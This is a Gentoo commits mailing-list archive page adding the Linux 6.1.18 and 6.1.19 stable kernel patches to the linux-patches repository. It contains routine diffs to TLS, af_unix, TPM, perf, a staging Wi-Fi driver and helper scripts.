+@@ -559,13 +545,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(crypto_info_aria_gcm_256->iv,
+ 		       cctx->iv + TLS_CIPHER_ARIA_GCM_256_SALT_SIZE,
+ 		       TLS_CIPHER_ARIA_GCM_256_IV_SIZE);
+ 		memcpy(crypto_info_aria_gcm_256->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_ARIA_GCM_256_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval,
+ 				 crypto_info_aria_gcm_256,
+ 				 sizeof(*crypto_info_aria_gcm_256)))
+@@ -614,11 +598,9 @@ static int do_tls_getsockopt_no_pad(struct sock *sk, char __user *optval,
+ 	if (len < sizeof(value))
+ 		return -EINVAL;
+ 
+-	lock_sock(sk);
+ 	value = -EINVAL;
+ 	if (ctx->rx_conf == TLS_SW || ctx->rx_conf == TLS_HW)
+ 		value = ctx->rx_no_pad;
+-	release_sock(sk);
+ 	if (value < 0)
+ 		return value;
+ 
+@@ -635,6 +617,8 @@ static int do_tls_getsockopt(struct sock *sk, int optname,
+ {
+ 	int rc = 0;
+ 
++	lock_sock(sk);
++
+ 	switch (optname) {
+ 	case TLS_TX:
+ 	case TLS_RX:
+@@ -651,6 +635,9 @@ static int do_tls_getsockopt(struct sock *sk, int optname,
+ 		rc = -ENOPROTOOPT;
+ 		break;
+ 	}
++
++	release_sock(sk);
++
+ 	return rc;
+ }
+ 
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index 38dcd9b401027..992092aeebad9 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -2114,7 +2114,7 @@ recv_end:
+ 		else
+ 			err = process_rx_list(ctx, msg, &control, 0,
+ 					      async_copy_bytes, is_peek);
+-		decrypted = max(err, 0);
++		decrypted += max(err, 0);
+ 	}
+ 
+ 	copied += decrypted;
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index f0c2293f1d3b8..7d17601ceee79 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -2104,7 +2104,8 @@ out:
+ #define UNIX_SKB_FRAGS_SZ (PAGE_SIZE << get_order(32768))
+ 
+ #if IS_ENABLED(CONFIG_AF_UNIX_OOB)
+-static int queue_oob(struct socket *sock, struct msghdr *msg, struct sock *other)
++static int queue_oob(struct socket *sock, struct msghdr *msg, struct sock *other,
++		     struct scm_cookie *scm, bool fds_sent)
+ {
+ 	struct unix_sock *ousk = unix_sk(other);
+ 	struct sk_buff *skb;
+@@ -2115,6 +2116,11 @@ static int queue_oob(struct socket *sock, struct msghdr *msg, struct sock *other
+ 	if (!skb)
+ 		return err;
+ 
++	err = unix_scm_to_skb(scm, skb, !fds_sent);
++	if (err < 0) {
++		kfree_skb(skb);
++		return err;
++	}
+ 	skb_put(skb, 1);
+ 	err = skb_copy_datagram_from_iter(skb, 0, &msg->msg_iter, 1);
+ 
+@@ -2242,7 +2248,7 @@ static int unix_stream_sendmsg(struct socket *sock, struct msghdr *msg,
+ 
+ #if IS_ENABLED(CONFIG_AF_UNIX_OOB)
+ 	if (msg->msg_flags & MSG_OOB) {
+-		err = queue_oob(sock, msg, other);
++		err = queue_oob(sock, msg, other, &scm, fds_sent);
+ 		if (err)
+ 			goto out_err;
+ 		sent++;
+diff --git a/net/unix/unix_bpf.c b/net/unix/unix_bpf.c
+index e9bf155139612..2f9d8271c6ec7 100644
+--- a/net/unix/unix_bpf.c
++++ b/net/unix/unix_bpf.c
+@@ -54,6 +54,9 @@ static int unix_bpf_recvmsg(struct sock *sk, struct msghdr *msg,
+ 	struct sk_psock *psock;
+ 	int copied;
+ 
++	if (!len)
++		return 0;
++
+ 	psock = sk_psock_get(sk);
+ 	if (unlikely(!psock))
+ 		return __unix_recvmsg(sk, msg, len, flags);
+diff --git a/scripts/checkkconfigsymbols.py b/scripts/checkkconfigsymbols.py
+index 217d21abc86e8..36c920e713137 100755
+--- a/scripts/checkkconfigsymbols.py
++++ b/scripts/checkkconfigsymbols.py
+@@ -115,7 +115,7 @@ def parse_options():
+     return args
+ 
+ 
+-def main():
++def print_undefined_symbols():
+     """Main function of this module."""
+     args = parse_options()
+ 
+@@ -467,5 +467,16 @@ def parse_kconfig_file(kfile):
+     return defined, references
+ 
+ 
++def main():
++    try:
++        print_undefined_symbols()
++    except BrokenPipeError:
++        # Python flushes standard streams on exit; redirect remaining output
++        # to devnull to avoid another BrokenPipeError at shutdown
++        devnull = os.open(os.devnull, os.O_WRONLY)
++        os.dup2(devnull, sys.stdout.fileno())
++        sys.exit(1)  # Python exits with error code 1 on EPIPE
++
++
+ if __name__ == "__main__":
+     main()
+diff --git a/scripts/clang-tools/run-clang-tools.py b/scripts/clang-tools/run-clang-tools.py
+index 56f2ec8f0f40a..3266708a86586 100755
+--- a/scripts/clang-tools/run-clang-tools.py
++++ b/scripts/clang-tools/run-clang-tools.py
+@@ -61,14 +61,21 @@ def run_analysis(entry):
+ 
+ 
+ def main():
+-    args = parse_arguments()
++    try:
++        args = parse_arguments()
+ 
+-    lock = multiprocessing.Lock()
+-    pool = multiprocessing.Pool(initializer=init, initargs=(lock, args))
+-    # Read JSON data into the datastore variable
+-    with open(args.path, "r") as f:
+-        datastore = json.load(f)
+-        pool.map(run_analysis, datastore)
++        lock = multiprocessing.Lock()
++        pool = multiprocessing.Pool(initializer=init, initargs=(lock, args))
++        # Read JSON data into the datastore variable
++        with open(args.path, "r") as f:
++            datastore = json.load(f)
++            pool.map(run_analysis, datastore)
++    except BrokenPipeError:
++        # Python flushes standard streams on exit; redirect remaining output
++        # to devnull to avoid another BrokenPipeError at shutdown
++        devnull = os.open(os.devnull, os.O_WRONLY)
++        os.dup2(devnull, sys.stdout.fileno())
++        sys.exit(1)  # Python exits with error code 1 on EPIPE
+ 
+ 
+ if __name__ == "__main__":
+diff --git a/scripts/diffconfig b/scripts/diffconfig
+index d5da5fa05d1d3..43f0f3d273ae7 100755
+--- a/scripts/diffconfig
++++ b/scripts/diffconfig
+@@ -65,7 +65,7 @@ def print_config(op, config, value, new_value):
+         else:
+             print(" %s %s -> %s" % (config, value, new_value))
+ 
+-def main():
++def show_diff():
+     global merge_style
+ 
+     # parse command line args
+@@ -129,4 +129,16 @@ def main():
+     for config in new:
+         print_config("+", config, None, b[config])
+ 
+-main()
++def main():
++    try:
++        show_diff()
++    except BrokenPipeError:
++        # Python flushes standard streams on exit; redirect remaining output
++        # to devnull to avoid another BrokenPipeError at shutdown
++        devnull = os.open(os.devnull, os.O_WRONLY)
++        os.dup2(devnull, sys.stdout.fileno())
++        sys.exit(1)  # Python exits with error code 1 on EPIPE
++
++
++if __name__ == '__main__':
++    main()
+diff --git a/tools/perf/builtin-inject.c b/tools/perf/builtin-inject.c
+index e2ce5f294cbd4..333d8941ce4de 100644
+--- a/tools/perf/builtin-inject.c
++++ b/tools/perf/builtin-inject.c
+@@ -538,6 +538,7 @@ static int perf_event__repipe_buildid_mmap2(struct perf_tool *tool,
+ 			dso->hit = 1;
+ 		}
+ 		dso__put(dso);
++		perf_event__repipe(tool, event, sample, machine);
+ 		return 0;
+ 	}
+ 
+diff --git a/tools/perf/builtin-stat.c b/tools/perf/builtin-stat.c
+index 978fdc60b4e84..f6427e3a47421 100644
+--- a/tools/perf/builtin-stat.c
++++ b/tools/perf/builtin-stat.c
+@@ -528,12 +528,7 @@ static int enable_counters(void)
+ 			return err;
+ 	}
+ 
+-	/*
+-	 * We need to enable counters only if:
+-	 * - we don't have tracee (attaching to task or cpu)
+-	 * - we have initial delay configured
+-	 */
+-	if (!target__none(&target)) {
++	if (!target__enable_on_exec(&target)) {
+ 		if (!all_counters_use_bpf)
+ 			evlist__enable(evsel_list);
+ 	}
+@@ -906,7 +901,7 @@ try_again_reset:
+ 			return err;
+ 	}
+ 
+-	if (stat_config.initial_delay) {
++	if (target.initial_delay) {
+ 		pr_info(EVLIST_DISABLED_MSG);
+ 	} else {
+ 		err = enable_counters();
+@@ -918,8 +913,8 @@ try_again_reset:
+ 	if (forks)
+ 		evlist__start_workload(evsel_list);
+ 
+-	if (stat_config.initial_delay > 0) {
+-		usleep(stat_config.initial_delay * USEC_PER_MSEC);
++	if (target.initial_delay > 0) {
++		usleep(target.initial_delay * USEC_PER_MSEC);
+ 		err = enable_counters();
+ 		if (err)
+ 			return -1;
+@@ -1243,7 +1238,7 @@ static struct option stat_options[] = {
+ 		     "aggregate counts per thread", AGGR_THREAD),
+ 	OPT_SET_UINT(0, "per-node", &stat_config.aggr_mode,
+ 		     "aggregate counts per numa node", AGGR_NODE),
+-	OPT_INTEGER('D', "delay", &stat_config.initial_delay,
++	OPT_INTEGER('D', "delay", &target.initial_delay,
+ 		    "ms to wait before starting measurement after program start (-1: start with events disabled)"),
+ 	OPT_CALLBACK_NOOPT(0, "metric-only", &stat_config.metric_only, NULL,
+ 			"Only print computed metrics. No raw values", enable_metric_only),
+diff --git a/tools/perf/util/stat.c b/tools/perf/util/stat.c
+index 8ec8bb4a99129..b63b3a3129919 100644
+--- a/tools/perf/util/stat.c
++++ b/tools/perf/util/stat.c
+@@ -583,11 +583,7 @@ int create_perf_stat_counter(struct evsel *evsel,
+ 	if (evsel__is_group_leader(evsel)) {
+ 		attr->disabled = 1;
+ 
+-		/*
+-		 * In case of initial_delay we enable tracee
+-		 * events manually.
+-		 */
+-		if (target__none(target) && !config->initial_delay)
++		if (target__enable_on_exec(target))
+ 			attr->enable_on_exec = 1;
+ 	}
+ 
+diff --git a/tools/perf/util/stat.h b/tools/perf/util/stat.h
+index 35c940d7f29cd..05c5125d7f419 100644
+--- a/tools/perf/util/stat.h
++++ b/tools/perf/util/stat.h
+@@ -145,7 +145,6 @@ struct perf_stat_config {
+ 	FILE			*output;
+ 	unsigned int		 interval;
+ 	unsigned int		 timeout;
+-	int			 initial_delay;
+ 	unsigned int		 unit_width;
+ 	unsigned int		 metric_only_len;
+ 	int			 times;
+diff --git a/tools/perf/util/target.h b/tools/perf/util/target.h
+index daec6cba500d4..880f1af7f6ad6 100644
+--- a/tools/perf/util/target.h
++++ b/tools/perf/util/target.h
+@@ -18,6 +18,7 @@ struct target {
+ 	bool	     per_thread;
+ 	bool	     use_bpf;
+ 	bool	     hybrid;
++	int	     initial_delay;
+ 	const char   *attr_map;
+ };
+ 
+@@ -72,6 +73,17 @@ static inline bool target__none(struct target *target)
+ 	return !target__has_task(target) && !target__has_cpu(target);
+ }
+ 
++static inline bool target__enable_on_exec(struct target *target)
++{
++	/*
++	 * Normally enable_on_exec should be set if:
++	 *  1) The tracee process is forked (not attaching to existed task or cpu).
++	 *  2) And initial_delay is not configured.
++	 * Otherwise, we enable tracee events manually.
++	 */
++	return target__none(target) && !target->initial_delay;
++}
++
+ static inline bool target__has_per_thread(struct target *target)
+ {
+ 	return target->system_wide && target->per_thread;
+diff --git a/tools/testing/selftests/netfilter/nft_nat.sh b/tools/testing/selftests/netfilter/nft_nat.sh
+index 924ecb3f1f737..dd40d9f6f2599 100755
+--- a/tools/testing/selftests/netfilter/nft_nat.sh
++++ b/tools/testing/selftests/netfilter/nft_nat.sh
+@@ -404,6 +404,8 @@ EOF
+ 	echo SERVER-$family | ip netns exec "$ns1" timeout 5 socat -u STDIN TCP-LISTEN:2000 &
+ 	sc_s=$!
+ 
++	sleep 1
++
+ 	result=$(ip netns exec "$ns0" timeout 1 socat TCP:$daddr:2000 STDOUT)
+ 
+ 	if [ "$result" = "SERVER-inet" ];then


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-13 11:30 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2023-03-13 11:30 UTC (permalink / raw
  To: gentoo-commits

commit:     dc5364316903f1ae5699ba6756944fdb1d6a2dde
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Mon Mar 13 10:45:23 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Mon Mar 13 10:45:23 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=dc536431

Linux patch 6.1.19

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |   4 +
 1018_linux-6.1.19.patch | 264 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 268 insertions(+)

diff --git a/0000_README b/0000_README
index e3d2c14c..3728b6a9 100644
--- a/0000_README
+++ b/0000_README
@@ -115,6 +115,10 @@ Patch:  1017_linux-6.1.18.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.18
 
+Patch:  1018_linux-6.1.19.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.19
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1018_linux-6.1.19.patch b/1018_linux-6.1.19.patch
new file mode 100644
index 00000000..617404d5
--- /dev/null
+++ b/1018_linux-6.1.19.patch
@@ -0,0 +1,264 @@
+diff --git a/Makefile b/Makefile
+index a825361f71625..ea18c4c20738c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 18
++SUBLEVEL = 19
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/drivers/char/tpm/tpm-chip.c b/drivers/char/tpm/tpm-chip.c
+index 783d65fc71f07..409682d063098 100644
+--- a/drivers/char/tpm/tpm-chip.c
++++ b/drivers/char/tpm/tpm-chip.c
+@@ -507,6 +507,63 @@ static int tpm_add_legacy_sysfs(struct tpm_chip *chip)
+ 	return 0;
+ }
+ 
++/*
++ * Some AMD fTPM versions may cause stutter
++ * https://www.amd.com/en/support/kb/faq/pa-410
++ *
++ * Fixes are available in two series of fTPM firmware:
++ * 6.x.y.z series: 6.0.18.6 +
++ * 3.x.y.z series: 3.57.y.5 +
++ */
++static bool tpm_amd_is_rng_defective(struct tpm_chip *chip)
++{
++	u32 val1, val2;
++	u64 version;
++	int ret;
++
++	if (!(chip->flags & TPM_CHIP_FLAG_TPM2))
++		return false;
++
++	ret = tpm_request_locality(chip);
++	if (ret)
++		return false;
++
++	ret = tpm2_get_tpm_pt(chip, TPM2_PT_MANUFACTURER, &val1, NULL);
++	if (ret)
++		goto release;
++	if (val1 != 0x414D4400U /* AMD */) {
++		ret = -ENODEV;
++		goto release;
++	}
++	ret = tpm2_get_tpm_pt(chip, TPM2_PT_FIRMWARE_VERSION_1, &val1, NULL);
++	if (ret)
++		goto release;
++	ret = tpm2_get_tpm_pt(chip, TPM2_PT_FIRMWARE_VERSION_2, &val2, NULL);
++
++release:
++	tpm_relinquish_locality(chip);
++
++	if (ret)
++		return false;
++
++	version = ((u64)val1 << 32) | val2;
++	if ((version >> 48) == 6) {
++		if (version >= 0x0006000000180006ULL)
++			return false;
++	} else if ((version >> 48) == 3) {
++		if (version >= 0x0003005700000005ULL)
++			return false;
++	} else {
++		return false;
++	}
++
++	dev_warn(&chip->dev,
++		 "AMD fTPM version 0x%llx causes system stutter; hwrng disabled\n",
++		 version);
++
++	return true;
++}
++
+ static int tpm_hwrng_read(struct hwrng *rng, void *data, size_t max, bool wait)
+ {
+ 	struct tpm_chip *chip = container_of(rng, struct tpm_chip, hwrng);
+@@ -516,7 +573,8 @@ static int tpm_hwrng_read(struct hwrng *rng, void *data, size_t max, bool wait)
+ 
+ static int tpm_add_hwrng(struct tpm_chip *chip)
+ {
+-	if (!IS_ENABLED(CONFIG_HW_RANDOM_TPM) || tpm_is_firmware_upgrade(chip))
++	if (!IS_ENABLED(CONFIG_HW_RANDOM_TPM) || tpm_is_firmware_upgrade(chip) ||
++	    tpm_amd_is_rng_defective(chip))
+ 		return 0;
+ 
+ 	snprintf(chip->hwrng_name, sizeof(chip->hwrng_name),
+diff --git a/drivers/char/tpm/tpm.h b/drivers/char/tpm/tpm.h
+index 24ee4e1cc452a..830014a266090 100644
+--- a/drivers/char/tpm/tpm.h
++++ b/drivers/char/tpm/tpm.h
+@@ -150,6 +150,79 @@ enum tpm_sub_capabilities {
+ 	TPM_CAP_PROP_TIS_DURATION = 0x120,
+ };
+ 
++enum tpm2_pt_props {
++	TPM2_PT_NONE = 0x00000000,
++	TPM2_PT_GROUP = 0x00000100,
++	TPM2_PT_FIXED = TPM2_PT_GROUP * 1,
++	TPM2_PT_FAMILY_INDICATOR = TPM2_PT_FIXED + 0,
++	TPM2_PT_LEVEL = TPM2_PT_FIXED + 1,
++	TPM2_PT_REVISION = TPM2_PT_FIXED + 2,
++	TPM2_PT_DAY_OF_YEAR = TPM2_PT_FIXED + 3,
++	TPM2_PT_YEAR = TPM2_PT_FIXED + 4,
++	TPM2_PT_MANUFACTURER = TPM2_PT_FIXED + 5,
++	TPM2_PT_VENDOR_STRING_1 = TPM2_PT_FIXED + 6,
++	TPM2_PT_VENDOR_STRING_2 = TPM2_PT_FIXED + 7,
++	TPM2_PT_VENDOR_STRING_3 = TPM2_PT_FIXED + 8,
++	TPM2_PT_VENDOR_STRING_4 = TPM2_PT_FIXED + 9,
++	TPM2_PT_VENDOR_TPM_TYPE = TPM2_PT_FIXED + 10,
++	TPM2_PT_FIRMWARE_VERSION_1 = TPM2_PT_FIXED + 11,
++	TPM2_PT_FIRMWARE_VERSION_2 = TPM2_PT_FIXED + 12,
++	TPM2_PT_INPUT_BUFFER = TPM2_PT_FIXED + 13,
++	TPM2_PT_HR_TRANSIENT_MIN = TPM2_PT_FIXED + 14,
++	TPM2_PT_HR_PERSISTENT_MIN = TPM2_PT_FIXED + 15,
++	TPM2_PT_HR_LOADED_MIN = TPM2_PT_FIXED + 16,
++	TPM2_PT_ACTIVE_SESSIONS_MAX = TPM2_PT_FIXED + 17,
++	TPM2_PT_PCR_COUNT = TPM2_PT_FIXED + 18,
++	TPM2_PT_PCR_SELECT_MIN = TPM2_PT_FIXED + 19,
++	TPM2_PT_CONTEXT_GAP_MAX = TPM2_PT_FIXED + 20,
++	TPM2_PT_NV_COUNTERS_MAX = TPM2_PT_FIXED + 22,
++	TPM2_PT_NV_INDEX_MAX = TPM2_PT_FIXED + 23,
++	TPM2_PT_MEMORY = TPM2_PT_FIXED + 24,
++	TPM2_PT_CLOCK_UPDATE = TPM2_PT_FIXED + 25,
++	TPM2_PT_CONTEXT_HASH = TPM2_PT_FIXED + 26,
++	TPM2_PT_CONTEXT_SYM = TPM2_PT_FIXED + 27,
++	TPM2_PT_CONTEXT_SYM_SIZE = TPM2_PT_FIXED + 28,
++	TPM2_PT_ORDERLY_COUNT = TPM2_PT_FIXED + 29,
++	TPM2_PT_MAX_COMMAND_SIZE = TPM2_PT_FIXED + 30,
++	TPM2_PT_MAX_RESPONSE_SIZE = TPM2_PT_FIXED + 31,
++	TPM2_PT_MAX_DIGEST = TPM2_PT_FIXED + 32,
++	TPM2_PT_MAX_OBJECT_CONTEXT = TPM2_PT_FIXED + 33,
++	TPM2_PT_MAX_SESSION_CONTEXT = TPM2_PT_FIXED + 34,
++	TPM2_PT_PS_FAMILY_INDICATOR = TPM2_PT_FIXED + 35,
++	TPM2_PT_PS_LEVEL = TPM2_PT_FIXED + 36,
++	TPM2_PT_PS_REVISION = TPM2_PT_FIXED + 37,
++	TPM2_PT_PS_DAY_OF_YEAR = TPM2_PT_FIXED + 38,
++	TPM2_PT_PS_YEAR = TPM2_PT_FIXED + 39,
++	TPM2_PT_SPLIT_MAX = TPM2_PT_FIXED + 40,
++	TPM2_PT_TOTAL_COMMANDS = TPM2_PT_FIXED + 41,
++	TPM2_PT_LIBRARY_COMMANDS = TPM2_PT_FIXED + 42,
++	TPM2_PT_VENDOR_COMMANDS = TPM2_PT_FIXED + 43,
++	TPM2_PT_NV_BUFFER_MAX = TPM2_PT_FIXED + 44,
++	TPM2_PT_MODES = TPM2_PT_FIXED + 45,
++	TPM2_PT_MAX_CAP_BUFFER = TPM2_PT_FIXED + 46,
++	TPM2_PT_VAR = TPM2_PT_GROUP * 2,
++	TPM2_PT_PERMANENT = TPM2_PT_VAR + 0,
++	TPM2_PT_STARTUP_CLEAR = TPM2_PT_VAR + 1,
++	TPM2_PT_HR_NV_INDEX = TPM2_PT_VAR + 2,
++	TPM2_PT_HR_LOADED = TPM2_PT_VAR + 3,
++	TPM2_PT_HR_LOADED_AVAIL = TPM2_PT_VAR + 4,
++	TPM2_PT_HR_ACTIVE = TPM2_PT_VAR + 5,
++	TPM2_PT_HR_ACTIVE_AVAIL = TPM2_PT_VAR + 6,
++	TPM2_PT_HR_TRANSIENT_AVAIL = TPM2_PT_VAR + 7,
++	TPM2_PT_HR_PERSISTENT = TPM2_PT_VAR + 8,
++	TPM2_PT_HR_PERSISTENT_AVAIL = TPM2_PT_VAR + 9,
++	TPM2_PT_NV_COUNTERS = TPM2_PT_VAR + 10,
++	TPM2_PT_NV_COUNTERS_AVAIL = TPM2_PT_VAR + 11,
++	TPM2_PT_ALGORITHM_SET = TPM2_PT_VAR + 12,
++	TPM2_PT_LOADED_CURVES = TPM2_PT_VAR + 13,
++	TPM2_PT_LOCKOUT_COUNTER = TPM2_PT_VAR + 14,
++	TPM2_PT_MAX_AUTH_FAIL = TPM2_PT_VAR + 15,
++	TPM2_PT_LOCKOUT_INTERVAL = TPM2_PT_VAR + 16,
++	TPM2_PT_LOCKOUT_RECOVERY = TPM2_PT_VAR + 17,
++	TPM2_PT_NV_WRITE_RECOVERY = TPM2_PT_VAR + 18,
++	TPM2_PT_AUDIT_COUNTER_0 = TPM2_PT_VAR + 19,
++	TPM2_PT_AUDIT_COUNTER_1 = TPM2_PT_VAR + 20,
++};
+ 
+ /* 128 bytes is an arbitrary cap. This could be as large as TPM_BUFSIZE - 18
+  * bytes, but 128 is still a relatively large number of random bytes and
+diff --git a/drivers/staging/rtl8192e/rtl8192e/rtl_dm.c b/drivers/staging/rtl8192e/rtl8192e/rtl_dm.c
+index 702551056227d..f660f947ab631 100644
+--- a/drivers/staging/rtl8192e/rtl8192e/rtl_dm.c
++++ b/drivers/staging/rtl8192e/rtl8192e/rtl_dm.c
+@@ -185,7 +185,6 @@ static void _rtl92e_dm_init_fsync(struct net_device *dev);
+ static void _rtl92e_dm_deinit_fsync(struct net_device *dev);
+ 
+ static	void _rtl92e_dm_check_txrateandretrycount(struct net_device *dev);
+-static  void _rtl92e_dm_check_ac_dc_power(struct net_device *dev);
+ static void _rtl92e_dm_check_fsync(struct net_device *dev);
+ static void _rtl92e_dm_check_rf_ctrl_gpio(void *data);
+ static void _rtl92e_dm_fsync_timer_callback(struct timer_list *t);
+@@ -238,8 +237,6 @@ void rtl92e_dm_watchdog(struct net_device *dev)
+ 	if (priv->being_init_adapter)
+ 		return;
+ 
+-	_rtl92e_dm_check_ac_dc_power(dev);
+-
+ 	_rtl92e_dm_check_txrateandretrycount(dev);
+ 	_rtl92e_dm_check_edca_turbo(dev);
+ 
+@@ -257,28 +254,6 @@ void rtl92e_dm_watchdog(struct net_device *dev)
+ 	_rtl92e_dm_cts_to_self(dev);
+ }
+ 
+-static void _rtl92e_dm_check_ac_dc_power(struct net_device *dev)
+-{
+-	struct r8192_priv *priv = rtllib_priv(dev);
+-	static const char ac_dc_script[] = "/etc/acpi/wireless-rtl-ac-dc-power.sh";
+-	char *argv[] = {(char *)ac_dc_script, DRV_NAME, NULL};
+-	static char *envp[] = {"HOME=/",
+-			"TERM=linux",
+-			"PATH=/usr/bin:/bin",
+-			 NULL};
+-
+-	if (priv->ResetProgress == RESET_TYPE_SILENT) {
+-		return;
+-	}
+-
+-	if (priv->rtllib->state != RTLLIB_LINKED)
+-		return;
+-	call_usermodehelper(ac_dc_script, argv, envp, UMH_WAIT_PROC);
+-
+-	return;
+-};
+-
+-
+ void rtl92e_init_adaptive_rate(struct net_device *dev)
+ {
+ 
+@@ -1667,10 +1642,6 @@ static void _rtl92e_dm_check_rf_ctrl_gpio(void *data)
+ 	u8 tmp1byte;
+ 	enum rt_rf_power_state rf_power_state_to_set;
+ 	bool bActuallySet = false;
+-	char *argv[3];
+-	static const char RadioPowerPath[] = "/etc/acpi/events/RadioPower.sh";
+-	static char *envp[] = {"HOME=/", "TERM=linux", "PATH=/usr/bin:/bin",
+-			       NULL};
+ 
+ 	bActuallySet = false;
+ 
+@@ -1700,14 +1671,6 @@ static void _rtl92e_dm_check_rf_ctrl_gpio(void *data)
+ 		mdelay(1000);
+ 		priv->bHwRfOffAction = 1;
+ 		rtl92e_set_rf_state(dev, rf_power_state_to_set, RF_CHANGE_BY_HW);
+-		if (priv->hw_radio_off)
+-			argv[1] = "RFOFF";
+-		else
+-			argv[1] = "RFON";
+-
+-		argv[0] = (char *)RadioPowerPath;
+-		argv[2] = NULL;
+-		call_usermodehelper(RadioPowerPath, argv, envp, UMH_WAIT_PROC);
+ 	}
+ }
+ 
+diff --git a/net/wireless/sme.c b/net/wireless/sme.c
+index 89fc5683ed26c..6e87d2cd83456 100644
+--- a/net/wireless/sme.c
++++ b/net/wireless/sme.c
+@@ -1486,8 +1486,6 @@ int cfg80211_connect(struct cfg80211_registered_device *rdev,
+ 		connect->key = NULL;
+ 		connect->key_len = 0;
+ 		connect->key_idx = 0;
+-		connect->crypto.cipher_group = 0;
+-		connect->crypto.n_ciphers_pairwise = 0;
+ 	}
+ 
+ 	wdev->connect_keys = connkeys;


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-11 14:09 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-03-11 14:09 UTC (permalink / raw
  To: gentoo-commits

commit:     0fdb24c0cf993d08834d5d2b4d00d0e195ad5567
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Mar 11 14:09:04 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Mar 11 14:09:04 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=0fdb24c0

Linux patch 6.1.18

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1017_linux-6.1.18.patch | 9430 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 9434 insertions(+)

diff --git a/0000_README b/0000_README
index e2811191..e3d2c14c 100644
--- a/0000_README
+++ b/0000_README
@@ -111,6 +111,10 @@ Patch:  1016_linux-6.1.17.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.17
 
+Patch:  1017_linux-6.1.18.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.18
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1017_linux-6.1.18.patch b/1017_linux-6.1.18.patch
new file mode 100644
index 00000000..ed54f1f1
--- /dev/null
+++ b/1017_linux-6.1.18.patch
@@ -0,0 +1,9430 @@
+diff --git a/Documentation/ABI/testing/configfs-usb-gadget-uvc b/Documentation/ABI/testing/configfs-usb-gadget-uvc
+index 611b23e6488d9..feb3f2cc0c167 100644
+--- a/Documentation/ABI/testing/configfs-usb-gadget-uvc
++++ b/Documentation/ABI/testing/configfs-usb-gadget-uvc
+@@ -52,7 +52,7 @@ Date:		Dec 2014
+ KernelVersion:	4.0
+ Description:	Default output terminal descriptors
+ 
+-		All attributes read only:
++		All attributes read only except bSourceID:
+ 
+ 		==============	=============================================
+ 		iTerminal	index of string descriptor
+diff --git a/Makefile b/Makefile
+index db482a420dcaf..a825361f71625 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 17
++SUBLEVEL = 18
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/spear320-hmi.dts b/arch/arm/boot/dts/spear320-hmi.dts
+index 34503ac9c51c2..721e5ee7b6803 100644
+--- a/arch/arm/boot/dts/spear320-hmi.dts
++++ b/arch/arm/boot/dts/spear320-hmi.dts
+@@ -241,7 +241,7 @@
+ 					irq-trigger = <0x1>;
+ 
+ 					stmpegpio: stmpe-gpio {
+-						compatible = "stmpe,gpio";
++						compatible = "st,stmpe-gpio";
+ 						reg = <0>;
+ 						gpio-controller;
+ 						#gpio-cells = <2>;
+diff --git a/arch/arm64/include/asm/efi.h b/arch/arm64/include/asm/efi.h
+index b13c22046de58..62c846be2d76a 100644
+--- a/arch/arm64/include/asm/efi.h
++++ b/arch/arm64/include/asm/efi.h
+@@ -33,7 +33,7 @@ int efi_set_mapping_permissions(struct mm_struct *mm, efi_memory_desc_t *md);
+ ({									\
+ 	efi_virtmap_load();						\
+ 	__efi_fpsimd_begin();						\
+-	spin_lock(&efi_rt_lock);					\
++	raw_spin_lock(&efi_rt_lock);					\
+ })
+ 
+ #undef arch_efi_call_virt
+@@ -42,12 +42,12 @@ int efi_set_mapping_permissions(struct mm_struct *mm, efi_memory_desc_t *md);
+ 
+ #define arch_efi_call_virt_teardown()					\
+ ({									\
+-	spin_unlock(&efi_rt_lock);					\
++	raw_spin_unlock(&efi_rt_lock);					\
+ 	__efi_fpsimd_end();						\
+ 	efi_virtmap_unload();						\
+ })
+ 
+-extern spinlock_t efi_rt_lock;
